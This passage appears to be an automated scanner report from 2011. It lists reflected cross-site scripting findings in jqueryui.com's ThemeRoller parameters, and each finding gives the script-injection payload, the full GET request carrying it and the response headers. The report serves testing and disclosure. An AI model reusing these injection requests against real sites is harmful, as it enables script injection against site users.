Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:14 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120029
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa33"><script>alert(1)</script>92ca4dfbc3d was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png5fa33"><script>alert(1)</script>92ca4dfbc3d&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120029
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcec"><script>alert(1)</script>f1da83410 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png3fcec"><script>alert(1)</script>f1da83410&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120025
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ed7"><script>alert(1)</script>5c3a54a40b7 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png25ed7"><script>alert(1)</script>5c3a54a40b7&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120029
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93619"><script>alert(1)</script>db84fe6e96f was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png93619"><script>alert(1)</script>db84fe6e96f&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120029
The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33ed5"><script>alert(1)</script>35d4c5ff8a was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png33ed5"><script>alert(1)</script>35d4c5ff8a&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120027
The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fad"><script>alert(1)</script>436b3b12950 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F37fad"><script>alert(1)</script>436b3b12950&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac137"><script>alert(1)</script>af50a204ab8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260Fac137"><script>alert(1)</script>af50a204ab8&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b43b"><script>alert(1)</script>221887cbb13 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F6b43b"><script>alert(1)</script>221887cbb13&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4547"><script>alert(1)</script>cf86ed9c393 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0ad4547"><script>alert(1)</script>cf86ed9c393&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3c1e"><script>alert(1)</script>0c7fc6ae90d was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260Fd3c1e"><script>alert(1)</script>0c7fc6ae90d&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97727"><script>alert(1)</script>83c0a5762c0 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa197727"><script>alert(1)</script>83c0a5762c0&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:52:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120095
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6d4"><script>alert(1)</script>c82fe09df08 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F5c6d4"><script>alert(1)</script>c82fe09df08&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 22:51:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120095
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb90d"><script>alert(1)</script>1fcf803181c was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxfb90d"><script>alert(1)</script>1fcf803181c&bgColorHeader=C14D1A&bgTextureHeader=02_glass.png&bgImgOpacityHeader=50&borderColorHeader=5E260F&fcHeader=ffffff&iconColorHeader=F1B50F&bgColorContent=2E1D1D&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=10&borderColorContent=5E260F&fcContent=ffffff&iconColorContent=222222&bgColorDefault=ffffff&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=5E260F&fcDefault=5E260F&iconColorDefault=888888&bgColorHover=F1B50F&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=5E260F&fcHover=212121&iconColorHover=454545&bgColorActive=C7842D&bgTextureActive=01_flat.png&bgImgOpacityActive=65&borderColorActive=5E260F&fcActive=212121&iconColorActive=454545&bgColorHighlight=64A3D3&bgTextureHighlight=04_highlight_hard.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px 